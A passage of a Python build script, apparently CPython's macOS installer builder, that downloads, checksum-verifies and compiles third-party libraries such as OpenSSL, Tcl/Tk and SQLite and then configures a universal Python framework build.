return value.strip("\"'")
raise RuntimeError("Cannot find variable %s" % variable[:-1])
_cache_getVersion = None
def getVersion():
global _cache_getVersion
if _cache_getVersion is None:
_cache_getVersion = grepValue(
os.path.join(SRCDIR, 'configure'), 'PACKAGE_VERSION')
return _cache_getVersion
def getVersionMajorMinor():
return tuple([int(n) for n in getVersion().split('.', 2)])
_cache_getFullVersion = None
def getFullVersion():
global _cache_getFullVersion
if _cache_getFullVersion is not None:
return _cache_getFullVersion
fn = os.path.join(SRCDIR, 'Include', 'patchlevel.h')
for ln in open(fn):
if 'PY_VERSION' in ln:
_cache_getFullVersion = ln.split()[-1][1:-1]
return _cache_getFullVersion
raise RuntimeError("Cannot find full version??")
FW_PREFIX = ["Library", "Frameworks", "Python.framework"]
FW_VERSION_PREFIX = "--undefined--" # initialized in parseOptions
FW_SSL_DIRECTORY = "--undefined--" # initialized in parseOptions
# The directory we'll use to create the build (will be erased and recreated)
WORKDIR = "/tmp/_py"
# The directory we'll use to store third-party sources. Set this to something
# else if you don't want to re-fetch required libraries every time.
DEPSRC = os.path.join(WORKDIR, 'third-party')
DEPSRC = os.path.expanduser('~/Universal/other-sources')
universal_opts_map = { '32-bit': ('i386', 'ppc',),
'64-bit': ('x86_64', 'ppc64',),
'intel': ('i386', 'x86_64'),
'intel-32': ('i386',),
'intel-64': ('x86_64',),
'3-way': ('ppc', 'i386', 'x86_64'),
'all': ('i386', 'ppc', 'x86_64', 'ppc64',) }
default_target_map = {
'64-bit': '10.5',
'3-way': '10.5',
'intel': '10.5',
'intel-32': '10.4',
'intel-64': '10.5',
'all': '10.5',
}
UNIVERSALOPTS = tuple(universal_opts_map.keys())
UNIVERSALARCHS = '32-bit'
ARCHLIST = universal_opts_map[UNIVERSALARCHS]
# Source directory (assume we're in Mac/BuildScript)
SRCDIR = os.path.dirname(
os.path.dirname(
os.path.dirname(
os.path.abspath(__file__
))))
# $MACOSX_DEPLOYMENT_TARGET -> minimum OS X level
DEPTARGET = '10.5'
def getDeptargetTuple():
return tuple([int(n) for n in DEPTARGET.split('.')[0:2]])
def getTargetCompilers():
target_cc_map = {
'10.4': ('gcc-4.0', 'g++-4.0'),
'10.5': ('gcc', 'g++'),
'10.6': ('gcc', 'g++'),
}
return target_cc_map.get(DEPTARGET, ('gcc', 'g++') )
CC, CXX = getTargetCompilers()
PYTHON_2 = getVersionMajorMinor()[0] == 2
PYTHON_3 = getVersionMajorMinor()[0] == 3
USAGE = textwrap.dedent("""\
Usage: build_python [options]
Options:
-? or -h: Show this message
-b DIR
--build-dir=DIR: Create build here (default: %(WORKDIR)r)
--third-party=DIR: Store third-party sources here (default: %(DEPSRC)r)
--sdk-path=DIR: Location of the SDK (deprecated, use SDKROOT env variable)
--src-dir=DIR: Location of the Python sources (default: %(SRCDIR)r)
--dep-target=10.n macOS deployment target (default: %(DEPTARGET)r)
--universal-archs=x universal architectures (options: %(UNIVERSALOPTS)r, default: %(UNIVERSALARCHS)r)
""")% globals()
# Dict of object file names with shared library names to check after building.
# This is to ensure that we ended up dynamically linking with the shared
# library paths and versions we expected. For example:
# EXPECTED_SHARED_LIBS['_tkinter.so'] = [
# '/Library/Frameworks/Tcl.framework/Versions/8.5/Tcl',
# '/Library/Frameworks/Tk.framework/Versions/8.5/Tk']
EXPECTED_SHARED_LIBS = {}
# Are we building and linking with our own copy of Tcl/TK?
# For now, do so if deployment target is 10.6+.
def internalTk():
return getDeptargetTuple() >= (10, 6)
# List of names of third party software built with this installer.
# The names will be inserted into the rtf version of the License.
THIRD_PARTY_LIBS = []
# Instructions for building libraries that are necessary for building a
# batteries included python.
# [The recipes are defined here for convenience but instantiated later after
# command line options have been processed.]
def library_recipes():
result = []
LT_10_5 = bool(getDeptargetTuple() < (10, 5))
# Since Apple removed the header files for the deprecated system
# OpenSSL as of the Xcode 7 release (for OS X 10.10+), we do not
# have much choice but to build our own copy here, too.
result.extend([
dict(
name="OpenSSL 1.0.2u",
url="https://www.openssl.org/source/old/1.0.2/openssl-1.0.2u.tar.gz",
checksum='cdc2638f789ecc2db2c91488265686c1',
buildrecipe=build_universal_openssl,
configure=None,
install=None,
),
])
if internalTk():
result.extend([
dict(
name="Tcl 8.6.8",
url="ftp://ftp.tcl.tk/pub/tcl//tcl8_6/tcl8.6.8-src.tar.gz",
checksum='81656d3367af032e0ae6157eff134f89',
buildDir="unix",
configure_pre=[
'--enable-shared',
'--enable-threads',
'--libdir=/Library/Frameworks/Python.framework/Versions/%s/lib'%(getVersion(),),
],
useLDFlags=False,
install='make TCL_LIBRARY=%(TCL_LIBRARY)s && make install TCL_LIBRARY=%(TCL_LIBRARY)s DESTDIR=%(DESTDIR)s'%{
"DESTDIR": shellQuote(os.path.join(WORKDIR, 'libraries')),
"TCL_LIBRARY": shellQuote('/Library/Frameworks/Python.framework/Versions/%s/lib/tcl8.6'%(getVersion())),
},
),
dict(
name="Tk 8.6.8",
url="ftp://ftp.tcl.tk/pub/tcl//tcl8_6/tk8.6.8-src.tar.gz",
checksum='5e0faecba458ee1386078fb228d008ba',
patches=[
"tk868_on_10_8_10_9.patch",
],
buildDir="unix",
configure_pre=[
'--enable-aqua',
'--enable-shared',
'--enable-threads',
'--libdir=/Library/Frameworks/Python.framework/Versions/%s/lib'%(getVersion(),),
],
useLDFlags=False,
install='make TCL_LIBRARY=%(TCL_LIBRARY)s TK_LIBRARY=%(TK_LIBRARY)s && make install TCL_LIBRARY=%(TCL_LIBRARY)s TK_LIBRARY=%(TK_LIBRARY)s DESTDIR=%(DESTDIR)s'%{
"DESTDIR": shellQuote(os.path.join(WORKDIR, 'libraries')),
"TCL_LIBRARY": shellQuote('/Library/Frameworks/Python.framework/Versions/%s/lib/tcl8.6'%(getVersion())),
"TK_LIBRARY": shellQuote('/Library/Frameworks/Python.framework/Versions/%s/lib/tk8.6'%(getVersion())),
},
),
])
if PYTHON_3:
result.extend([
dict(
name="XZ 5.2.3",
url="http://tukaani.org/xz/xz-5.2.3.tar.gz",
checksum='ef68674fb47a8b8e741b34e429d86e9d',
configure_pre=[
'--disable-dependency-tracking',
]
),
])
result.extend([
dict(
name="NCurses 5.9",
url="http://ftp.gnu.org/pub/gnu/ncurses/ncurses-5.9.tar.gz",
checksum='8cb9c412e5f2d96bc6f459aa8c6282a1',
configure_pre=[
"--enable-widec",
"--without-cxx",
"--without-cxx-binding",
"--without-ada",
"--without-curses-h",
"--enable-shared",
"--with-shared",
"--without-debug",
"--without-normal",
"--without-tests",
"--without-manpages",
"--datadir=/usr/share",
"--sysconfdir=/etc",
"--sharedstatedir=/usr/com",
"--with-terminfo-dirs=/usr/share/terminfo",
"--with-default-terminfo-dir=/usr/share/terminfo",
"--libdir=/Library/Frameworks/Python.framework/Versions/%s/lib"%(getVersion(),),
],
patchscripts=[
("ftp://invisible-island.net/ncurses//5.9/ncurses-5.9-20120616-patch.sh.bz2",
"f54bf02a349f96a7c4f0d00922f3a0d4"),
],
useLDFlags=False,
install='make && make install DESTDIR=%s && cd %s/usr/local/lib && ln -fs ../../../Library/Frameworks/Python.framework/Versions/%s/lib/lib* .'%(
shellQuote(os.path.join(WORKDIR, 'libraries')),
shellQuote(os.path.join(WORKDIR, 'libraries')),
getVersion(),
),
),
dict(
name="SQLite 3.31.1",
url="https://sqlite.org/2020/sqlite-autoconf-3310100.tar.gz",
checksum='2d0a553534c521504e3ac3ad3b90f125',
extra_cflags=('-Os '
'-DSQLITE_ENABLE_FTS5 '
'-DSQLITE_ENABLE_FTS4 '
'-DSQLITE_ENABLE_FTS3_PARENTHESIS '
'-DSQLITE_ENABLE_JSON1 '
'-DSQLITE_ENABLE_RTREE '
'-DSQLITE_TCL=0 '
'%s' % ('','-DSQLITE_WITHOUT_ZONEMALLOC ')[LT_10_5]),
configure_pre=[
'--enable-threadsafe',
'--enable-shared=no',
'--enable-static=yes',
'--disable-readline',
'--disable-dependency-tracking',
]
),
])
if getDeptargetTuple() < (10, 5):
result.extend([
dict(
name="Bzip2 1.0.6",
url="http://bzip.org/1.0.6/bzip2-1.0.6.tar.gz",
checksum='00b516f4704d4a7cb50a1d97e6e8e15b',
configure=None,
install='make install CC=%s CXX=%s, PREFIX=%s/usr/local/ CFLAGS="-arch %s"'%(
CC, CXX,
shellQuote(os.path.join(WORKDIR, 'libraries')),
' -arch '.join(ARCHLIST),
),
),
dict(
name="ZLib 1.2.3",
url="http://www.gzip.org/zlib/zlib-1.2.3.tar.gz",
checksum='debc62758716a169df9f62e6ab2bc634',
configure=None,
install='make install CC=%s CXX=%s, prefix=%s/usr/local/ CFLAGS="-arch %s"'%(
CC, CXX,
shellQuote(os.path.join(WORKDIR, 'libraries')),
' -arch '.join(ARCHLIST),
),
),
dict(
# Note that GNU readline is GPL'd software
name="GNU Readline 6.1.2",
url="http://ftp.gnu.org/pub/gnu/readline/readline-6.1.tar.gz" ,
checksum='fc2f7e714fe792db1ce6ddc4c9fb4ef3',
patchlevel='0',
patches=[
# The readline maintainers don't do actual micro releases, but
# just ship a set of patches.
('http://ftp.gnu.org/pub/gnu/readline/readline-6.1-patches/readline61-001',
'c642f2e84d820884b0bf9fd176bc6c3f'),
('http://ftp.gnu.org/pub/gnu/readline/readline-6.1-patches/readline61-002',
'1a76781a1ea734e831588285db7ec9b1'),
]
),
])
if not PYTHON_3:
result.extend([
dict(
name="Sleepycat DB 4.7.25",
url="http://download.oracle.com/berkeley-db/db-4.7.25.tar.gz",
checksum='ec2b87e833779681a0c3a814aa71359e',
buildDir="build_unix",
configure="../dist/configure",
configure_pre=[
'--includedir=/usr/local/include/db4',
]
),
])
return result
# Instructions for building packages inside the .mpkg.
def pkg_recipes():
unselected_for_python3 = ('selected', 'unselected')[PYTHON_3]
result = [
dict(
name="PythonFramework",
long_name="Python Framework",
source="/Library/Frameworks/Python.framework",
readme="""\
                This package installs Python.framework, that is, the Python
                interpreter and the standard library.
""",
postflight="scripts/postflight.framework",
selected='selected',
),
dict(
name="PythonApplications",
long_name="GUI Applications",
source="/Applications/Python %(VER)s",
readme="""\
This package installs IDLE (an interactive Python IDE),
Python Launcher and Build Applet (create application bundles
from python scripts).
It also installs a number of examples and demos.
""",
required=False,
selected='selected',
),
dict(
name="PythonUnixTools",
long_name="UNIX command-line tools",
source="/usr/local/bin",
readme="""\
This package installs the unix tools in /usr/local/bin for
compatibility with older releases of Python. This package
is not necessary to use Python.
""",
required=False,
selected='selected',
),
dict(
name="PythonDocumentation",
long_name="Python Documentation",
topdir="/Library/Frameworks/Python.framework/Versions/%(VER)s/Resources/English.lproj/Documentation",
source="/pydocs",
readme="""\
This package installs the python documentation at a location
                that is usable for pydoc and IDLE.
""",
postflight="scripts/postflight.documentation",
required=False,
selected='selected',
),
dict(
name="PythonProfileChanges",
long_name="Shell profile updater",
readme="""\
                This package updates your shell profile to make sure that
                the Python tools are found by your shell in preference to
                the system-provided Python tools.
If you don't install this package you'll have to add
"/Library/Frameworks/Python.framework/Versions/%(VER)s/bin"
to your PATH by hand.
""",
postflight="scripts/postflight.patch-profile",
topdir="/Library/Frameworks/Python.framework",
source="/empty-dir",
required=False,
selected='selected',
),
dict(
name="PythonInstallPip",
long_name="Install or upgrade pip",
readme="""\
This package installs (or upgrades from an earlier version)
pip, a tool for installing and managing Python packages.
""",
postflight="scripts/postflight.ensurepip",
topdir="/Library/Frameworks/Python.framework",
source="/empty-dir",
required=False,
selected='selected',
),
]
return result
def fatal(msg):
"""
A fatal error, bail out.
"""
sys.stderr.write('FATAL: ')
sys.stderr.write(msg)
sys.stderr.write('\n')
sys.exit(1)
def fileContents(fn):
"""
Return the contents of the named file
"""
return open(fn, 'r').read()
def runCommand(commandline):
"""
Run a command and raise RuntimeError if it fails. Output is suppressed
unless the command fails.
"""
fd = os.popen(commandline, 'r')
data = fd.read()
xit = fd.close()
if xit is not None:
sys.stdout.write(data)
raise RuntimeError("command failed: %s"%(commandline,))
if VERBOSE:
sys.stdout.write(data); sys.stdout.flush()
def captureCommand(commandline):
fd = os.popen(commandline, 'r')
data = fd.read()
xit = fd.close()
if xit is not None:
sys.stdout.write(data)
raise RuntimeError("command failed: %s"%(commandline,))
return data
def getTclTkVersion(configfile, versionline):
"""
    Search a Tcl or Tk configuration file for the version line.
"""
try:
f = open(configfile, "r")
except OSError:
fatal("Framework configuration file not found: %s" % configfile)
for l in f:
if l.startswith(versionline):
f.close()
return l
fatal("Version variable %s not found in framework configuration file: %s"
% (versionline, configfile))
def checkEnvironment():
"""
Check that we're running on a supported system.
"""
if sys.version_info[0:2] < (2, 5):
fatal("This script must be run with Python 2.5 (or later)")
if platform.system() != 'Darwin':
fatal("This script should be run on a macOS 10.5 (or later) system")
if int(platform.release().split('.')[0]) < 8:
fatal("This script should be run on a macOS 10.5 (or later) system")
    # Because we only support dynamic loading of one major/minor version of
    # Tcl/Tk, if we are not building and using our own private copy of
    # Tcl/Tk, ensure:
# 1. there is a user-installed framework (usually ActiveTcl) in (or linked
# in) SDKROOT/Library/Frameworks. As of Python 3.6.5, we no longer
# enforce that the version of the user-installed framework also
# exists in the system-supplied Tcl/Tk frameworks. Time to support
# Tcl/Tk 8.6 even if Apple does not.
if not internalTk():
frameworks = {}
for framework in ['Tcl', 'Tk']:
fwpth = 'Library/Frameworks/%s.framework/Versions/Current' % framework
libfw = os.path.join('/', fwpth)
usrfw = os.path.join(os.getenv('HOME'), fwpth)
frameworks[framework] = os.readlink(libfw)
if not os.path.exists(libfw):
fatal("Please install a link to a current %s %s as %s so "
"the user can override the system framework."
% (framework, frameworks[framework], libfw))
if os.path.exists(usrfw):
fatal("Please rename %s to avoid possible dynamic load issues."
% usrfw)
if frameworks['Tcl'] != frameworks['Tk']:
fatal("The Tcl and Tk frameworks are not the same version.")
print(" -- Building with external Tcl/Tk %s frameworks"
% frameworks['Tk'])
# add files to check after build
EXPECTED_SHARED_LIBS['_tkinter.so'] = [
"/Library/Frameworks/Tcl.framework/Versions/%s/Tcl"
% frameworks['Tcl'],
"/Library/Frameworks/Tk.framework/Versions/%s/Tk"
% frameworks['Tk'],
]
else:
print(" -- Building private copy of Tcl/Tk")
print("")
# Remove inherited environment variables which might influence build
environ_var_prefixes = ['CPATH', 'C_INCLUDE_', 'DYLD_', 'LANG', 'LC_',
'LD_', 'LIBRARY_', 'PATH', 'PYTHON']
for ev in list(os.environ):
for prefix in environ_var_prefixes:
if ev.startswith(prefix) :
print("INFO: deleting environment variable %s=%s" % (
ev, os.environ[ev]))
del os.environ[ev]
base_path = '/bin:/sbin:/usr/bin:/usr/sbin'
if 'SDK_TOOLS_BIN' in os.environ:
base_path = os.environ['SDK_TOOLS_BIN'] + ':' + base_path
# Xcode 2.5 on OS X 10.4 does not include SetFile in its usr/bin;
# add its fixed location here if it exists
OLD_DEVELOPER_TOOLS = '/Developer/Tools'
if os.path.isdir(OLD_DEVELOPER_TOOLS):
base_path = base_path + ':' + OLD_DEVELOPER_TOOLS
os.environ['PATH'] = base_path
print("Setting default PATH: %s"%(os.environ['PATH']))
if PYTHON_2:
# Ensure we have access to sphinx-build.
# You may have to define SDK_TOOLS_BIN and link to it there,
runCommand('sphinx-build --version')
def parseOptions(args=None):
"""
Parse arguments and update global settings.
"""
global WORKDIR, DEPSRC, SRCDIR, DEPTARGET
global UNIVERSALOPTS, UNIVERSALARCHS, ARCHLIST, CC, CXX
global FW_VERSION_PREFIX
global FW_SSL_DIRECTORY
if args is None:
args = sys.argv[1:]
try:
options, args = getopt.getopt(args, '?hb',
[ 'build-dir=', 'third-party=', 'sdk-path=' , 'src-dir=',
'dep-target=', 'universal-archs=', 'help' ])
except getopt.GetoptError:
print(sys.exc_info()[1])
sys.exit(1)
if args:
print("Additional arguments")
sys.exit(1)
deptarget = None
for k, v in options:
if k in ('-h', '-?', '--help'):
print(USAGE)
sys.exit(0)
elif k in ('-d', '--build-dir'):
WORKDIR=v
elif k in ('--third-party',):
DEPSRC=v
elif k in ('--sdk-path',):
print(" WARNING: --sdk-path is no longer supported")
elif k in ('--src-dir',):
SRCDIR=v
elif k in ('--dep-target', ):
DEPTARGET=v
deptarget=v
elif k in ('--universal-archs', ):
if v in UNIVERSALOPTS:
UNIVERSALARCHS = v
ARCHLIST = universal_opts_map[UNIVERSALARCHS]
if deptarget is None:
# Select alternate default deployment
# target
DEPTARGET = default_target_map.get(v, '10.5')
else:
raise NotImplementedError(v)
else:
raise NotImplementedError(k)
SRCDIR=os.path.abspath(SRCDIR)
WORKDIR=os.path.abspath(WORKDIR)
DEPSRC=os.path.abspath(DEPSRC)
CC, CXX = getTargetCompilers()
FW_VERSION_PREFIX = FW_PREFIX[:] + ["Versions", getVersion()]
FW_SSL_DIRECTORY = FW_VERSION_PREFIX[:] + ["etc", "openssl"]
print("-- Settings:")
print(" * Source directory: %s" % SRCDIR)
print(" * Build directory: %s" % WORKDIR)
print(" * Third-party source: %s" % DEPSRC)
print(" * Deployment target: %s" % DEPTARGET)
print(" * Universal archs: %s" % str(ARCHLIST))
print(" * C compiler: %s" % CC)
print(" * C++ compiler: %s" % CXX)
print("")
print(" -- Building a Python %s framework at patch level %s"
% (getVersion(), getFullVersion()))
print("")
def extractArchive(builddir, archiveName):
"""
Extract a source archive into 'builddir'. Returns the path of the
extracted archive.
XXX: This function assumes that archives contain a toplevel directory
    that has the same name as the basename of the archive.  This is
safe enough for almost anything we use. Unfortunately, it does not
work for current Tcl and Tk source releases where the basename of
the archive ends with "-src" but the uncompressed directory does not.
For now, just special case Tcl and Tk tar.gz downloads.
"""
curdir = os.getcwd()
try:
os.chdir(builddir)
if archiveName.endswith('.tar.gz'):
retval = os.path.basename(archiveName[:-7])
if ((retval.startswith('tcl') or retval.startswith('tk'))
and retval.endswith('-src')):
retval = retval[:-4]
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("tar zxf %s 2>&1"%(shellQuote(archiveName),), 'r')
elif archiveName.endswith('.tar.bz2'):
retval = os.path.basename(archiveName[:-8])
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("tar jxf %s 2>&1"%(shellQuote(archiveName),), 'r')
elif archiveName.endswith('.tar'):
retval = os.path.basename(archiveName[:-4])
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("tar xf %s 2>&1"%(shellQuote(archiveName),), 'r')
elif archiveName.endswith('.zip'):
retval = os.path.basename(archiveName[:-4])
if os.path.exists(retval):
shutil.rmtree(retval)
fp = os.popen("unzip %s 2>&1"%(shellQuote(archiveName),), 'r')
data = fp.read()
xit = fp.close()
if xit is not None:
sys.stdout.write(data)
raise RuntimeError("Cannot extract %s"%(archiveName,))
return os.path.join(builddir, retval)
finally:
os.chdir(curdir)
def downloadURL(url, fname):
"""
Download the contents of the url into the file.
"""
fpIn = urllib_request.urlopen(url)
fpOut = open(fname, 'wb')
block = fpIn.read(10240)
try:
while block:
fpOut.write(block)
block = fpIn.read(10240)
fpIn.close()
fpOut.close()
except:
try:
os.unlink(fname)
except OSError:
pass
def verifyThirdPartyFile(url, checksum, fname):
"""
Download file from url to filename fname if it does not already exist.
    Abort if the file contents do not match the supplied md5 checksum.
"""
name = os.path.basename(fname)
if os.path.exists(fname):
print("Using local copy of %s"%(name,))
else:
print("Did not find local copy of %s"%(name,))
print("Downloading %s"%(name,))
downloadURL(url, fname)
print("Archive for %s stored as %s"%(name, fname))
if os.system(
'MD5=$(openssl md5 %s) ; test "${MD5##*= }" = "%s"'
% (shellQuote(fname), checksum) ):
fatal('MD5 checksum mismatch for file %s' % fname)
def build_universal_openssl(basedir, archList):
"""
Special case build recipe for universal build of openssl.
The upstream OpenSSL build system does not directly support
OS X universal builds. We need to build each architecture
separately then lipo them together into fat libraries.
"""
# OpenSSL fails to build with Xcode 2.5 (on OS X 10.4).
# If we are building on a 10.4.x or earlier system,
# unilaterally disable assembly code building to avoid the problem.
no_asm = int(platform.release().split(".")[0]) < 9
def build_openssl_arch(archbase, arch):
"Build one architecture of openssl"
arch_opts = {
"i386": ["darwin-i386-cc"],
"x86_64": ["darwin64-x86_64-cc", "enable-ec_nistp_64_gcc_128"],
"ppc": ["darwin-ppc-cc"],
"ppc64": ["darwin64-ppc-cc"],
}
configure_opts = [
"no-krb5",
"no-idea",
"no-mdc2",
"no-rc5",
"no-zlib",
"enable-tlsext",
"no-ssl2",
"no-ssl3",
# "enable-unit-test",
"shared",
"--install_prefix=%s"%shellQuote(archbase),
"--prefix=%s"%os.path.join("/", *FW_VERSION_PREFIX),
"--openssldir=%s"%os.path.join("/", *FW_SSL_DIRECTORY),
]
if no_asm:
configure_opts.append("no-asm")
# OpenSSL 1.0.2o broke the Configure test for whether the compiler
# in use supports dependency rule generation (cc -M) with gcc-4.2
# used for the 10.6+ installer builds. Patch Configure here to
# force use of "cc -M" rather than "makedepend".
runCommand(
"""sed -i "" 's|my $cc_as_makedepend = 0|my $cc_as_makedepend = 1|g' Configure""")
runCommand(" ".join(["perl", "Configure"]
+ arch_opts[arch] + configure_opts))
runCommand("make depend")
runCommand("make all")
runCommand("make install_sw")
# runCommand("make test")
return
srcdir = os.getcwd()
universalbase = os.path.join(srcdir, "..",
os.path.basename(srcdir) + "-universal")
os.mkdir(universalbase)
archbasefws = []
for arch in archList:
# fresh copy of the source tree
archsrc = os.path.join(universalbase, arch, "src")
shutil.copytree(srcdir, archsrc, symlinks=True)
# install base for this arch
archbase = os.path.join(universalbase, arch, "root")
os.mkdir(archbase)
# Python framework base within install_prefix:
# the build will install into this framework..
# This is to ensure that the resulting shared libs have
# the desired real install paths built into them.
archbasefw = os.path.join(archbase, *FW_VERSION_PREFIX)
# build one architecture
os.chdir(archsrc)
build_openssl_arch(archbase, arch)
os.chdir(srcdir)
archbasefws.append(archbasefw)
# copy arch-independent files from last build into the basedir framework
basefw = os.path.join(basedir, *FW_VERSION_PREFIX)
shutil.copytree(
os.path.join(archbasefw, "include", "openssl"),
os.path.join(basefw, "include", "openssl")
)
shlib_version_number = grepValue(os.path.join(archsrc, "Makefile"),
"SHLIB_VERSION_NUMBER")
# e.g. -> "1.0.0"
libcrypto = "libcrypto.dylib"
libcrypto_versioned = libcrypto.replace(".", "."+shlib_version_number+".")
# e.g. -> "libcrypto.1.0.0.dylib"
libssl = "libssl.dylib"
libssl_versioned = libssl.replace(".", "."+shlib_version_number+".")
# e.g. -> "libssl.1.0.0.dylib"
try:
os.mkdir(os.path.join(basefw, "lib"))
except OSError:
pass
# merge the individual arch-dependent shared libs into a fat shared lib
archbasefws.insert(0, basefw)
for (lib_unversioned, lib_versioned) in [
(libcrypto, libcrypto_versioned),
(libssl, libssl_versioned)
]:
runCommand("lipo -create -output " +
" ".join(shellQuote(
os.path.join(fw, "lib", lib_versioned))
for fw in archbasefws))
# and create an unversioned symlink of it
os.symlink(lib_versioned, os.path.join(basefw, "lib", lib_unversioned))
# Create links in the temp include and lib dirs that will be injected
# into the Python build so that setup.py can find them while building
# and the versioned links so that the setup.py post-build import test
# does not fail.
relative_path = os.path.join("..", "..", "..", *FW_VERSION_PREFIX)
for fn in [
["include", "openssl"],
["lib", libcrypto],
["lib", libssl],
["lib", libcrypto_versioned],
["lib", libssl_versioned],
]:
os.symlink(
os.path.join(relative_path, *fn),
os.path.join(basedir, "usr", "local", *fn)
)
return
def buildRecipe(recipe, basedir, archList):
"""
Build software using a recipe. This function does the
'configure;make;make install' dance for C software, with a possibility
    to customize this process, basically a poor man's DarwinPorts.
"""
curdir = os.getcwd()
name = recipe['name']
THIRD_PARTY_LIBS.append(name)
url = recipe['url']
configure = recipe.get('configure', './configure')
buildrecipe = recipe.get('buildrecipe', None)
install = recipe.get('install', 'make && make install DESTDIR=%s'%(
shellQuote(basedir)))
archiveName = os.path.split(url)[-1]
sourceArchive = os.path.join(DEPSRC, archiveName)
if not os.path.exists(DEPSRC):
os.mkdir(DEPSRC)
verifyThirdPartyFile(url, recipe['checksum'], sourceArchive)
print("Extracting archive for %s"%(name,))
buildDir=os.path.join(WORKDIR, '_bld')
if not os.path.exists(buildDir):
os.mkdir(buildDir)
workDir = extractArchive(buildDir, sourceArchive)
os.chdir(workDir)
for patch in recipe.get('patches', ()):
if isinstance(patch, tuple):
url, checksum = patch
fn = os.path.join(DEPSRC, os.path.basename(url))
verifyThirdPartyFile(url, checksum, fn)
else:
# patch is a file in the source directory
fn = os.path.join(curdir, patch)
runCommand('patch -p%s < %s'%(recipe.get('patchlevel', 1),
shellQuote(fn),))
for patchscript in recipe.get('patchscripts', ()):
if isinstance(patchscript, tuple):
url, checksum = patchscript
fn = os.path.join(DEPSRC, os.path.basename(url))
verifyThirdPartyFile(url, checksum, fn)
else:
# patch is a file in the source directory
fn = os.path.join(curdir, patchscript)
if fn.endswith('.bz2'):
runCommand('bunzip2 -fk %s' % shellQuote(fn))
fn = fn[:-4]
runCommand('sh %s' % shellQuote(fn))
os.unlink(fn)
if 'buildDir' in recipe:
os.chdir(recipe['buildDir'])
if configure is not None:
configure_args = [
"--prefix=/usr/local",
"--enable-static",
"--disable-shared",
#"CPP=gcc -arch %s -E"%(' -arch '.join(archList,),),
]
if 'configure_pre' in recipe:
args = list(recipe['configure_pre'])
if '--disable-static' in args:
configure_args.remove('--enable-static')
if '--enable-shared' in args:
configure_args.remove('--disable-shared')
configure_args.extend(args)
if recipe.get('useLDFlags', 1):
configure_args.extend([
"CFLAGS=%s-mmacosx-version-min=%s -arch %s "
"-I%s/usr/local/include"%(
recipe.get('extra_cflags', ''),
DEPTARGET,
' -arch '.join(archList),
shellQuote(basedir)[1:-1],),
"LDFLAGS=-mmacosx-version-min=%s -L%s/usr/local/lib -arch %s"%(
DEPTARGET,
shellQuote(basedir)[1:-1],
' -arch '.join(archList)),
])
else:
configure_args.extend([
"CFLAGS=%s-mmacosx-version-min=%s -arch %s "
"-I%s/usr/local/include"%(
recipe.get('extra_cflags', ''),
DEPTARGET,
' -arch '.join(archList),
shellQuote(basedir)[1:-1],),
])
if 'configure_post' in recipe:
configure_args = configure_args + list(recipe['configure_post'])
configure_args.insert(0, configure)
configure_args = [ shellQuote(a) for a in configure_args ]
print("Running configure for %s"%(name,))
runCommand(' '.join(configure_args) + ' 2>&1')
if buildrecipe is not None:
# call special-case build recipe, e.g. for openssl
buildrecipe(basedir, archList)
if install is not None:
print("Running install for %s"%(name,))
runCommand('{ ' + install + ' ;} 2>&1')
print("Done %s"%(name,))
print("")
os.chdir(curdir)
def buildLibraries():
"""
Build our dependencies into $WORKDIR/libraries/usr/local
"""
print("")
print("Building required libraries")
print("")
universal = os.path.join(WORKDIR, 'libraries')
os.mkdir(universal)
os.makedirs(os.path.join(universal, 'usr', 'local', 'lib'))
os.makedirs(os.path.join(universal, 'usr', 'local', 'include'))
for recipe in library_recipes():
buildRecipe(recipe, universal, ARCHLIST)
def buildPythonDocs():
# This stores the documentation as Resources/English.lproj/Documentation
# inside the framework. pydoc and IDLE will pick it up there.
print("Install python documentation")
rootDir = os.path.join(WORKDIR, '_root')
buildDir = os.path.join('../../Doc')
docdir = os.path.join(rootDir, 'pydocs')
curDir = os.getcwd()
os.chdir(buildDir)
runCommand('make clean')
if PYTHON_2:
# Python 2 doc builds do not use blurb nor do they have a venv target.
# Assume sphinx-build is on our PATH, checked in checkEnvironment
runCommand('make html')
else:
# Create virtual environment for docs builds with blurb and sphinx
runCommand('make venv')
runCommand('make html PYTHON=venv/bin/python')
os.chdir(curDir)
if not os.path.exists(docdir):
os.mkdir(docdir)
os.rename(os.path.join(buildDir, 'build', 'html'), docdir)
def buildPython():
print("Building a universal python for %s architectures" % UNIVERSALARCHS)
buildDir = os.path.join(WORKDIR, '_bld', 'python')
rootDir = os.path.join(WORKDIR, '_root')
if os.path.exists(buildDir):
shutil.rmtree(buildDir)
if os.path.exists(rootDir):
shutil.rmtree(rootDir)
os.makedirs(buildDir)
os.makedirs(rootDir)
os.makedirs(os.path.join(rootDir, 'empty-dir'))
curdir = os.getcwd()
os.chdir(buildDir)
# Extract the version from the configure file, needed to calculate
# several paths.
version = getVersion()
# Since the extra libs are not in their installed framework location
# during the build, augment the library path so that the interpreter
# will find them during its extension import sanity checks.
os.environ['DYLD_LIBRARY_PATH'] = os.path.join(WORKDIR,
'libraries', 'usr', 'local', 'lib')
print("Running configure...")
runCommand("%s -C --enable-framework --enable-universalsdk=/ "
"--with-universal-archs=%s "
"%s "
"%s "
"%s "
"%s "
"LDFLAGS='-g -L%s/libraries/usr/local/lib' "
"CFLAGS='-g -I%s/libraries/usr/local/include' 2>&1"%(
shellQuote(os.path.join(SRCDIR, 'configure')),
UNIVERSALARCHS,
(' ', '--with-computed-gotos ')[PYTHON_3],
(' ', '--without-ensurepip ')[PYTHON_3],
(' ', "--with-tcltk-includes='-I%s/libraries/usr/local/include'"%(
shellQuote(WORKDIR)[1:-1],))[internalTk()],
(' ', "--with-tcltk-libs='-L%s/libraries/usr/local/lib -ltcl8.6 -ltk8.6'"%(
shellQuote(WORKDIR)[1:-1],))[internalTk()],
shellQuote(WORKDIR)[1:-1],
shellQuote(WORKDIR)[1:-1]))
# Look for environment value BUILDINSTALLER_BUILDPYTHON_MAKE_EXTRAS
# and, if defined, append its value to the make command. This allows
# us to pass in version control tags, like GITTAG, to a build from a
# tarball rather than from a vcs checkout, thus eliminating the need
# to have a working copy of the vcs program on the build machine.
#
# A typical use might be:
# export BUILDINSTALLER_BUILDPYTHON_MAKE_EXTRAS=" \
# GITVERSION='echo 123456789a' \
# GITTAG='echo v3.6.0' \
# GITBRANCH='echo 3.6'"
make_extras = os.getenv("BUILDINSTALLER_BUILDPYTHON_MAKE_EXTRAS")
if make_extras:
make_cmd = "make " + make_extras
else:
make_cmd = "make"
print("Running " + make_cmd)
runCommand(make_cmd)
print("Running make install")
runCommand("make install DESTDIR=%s"%(
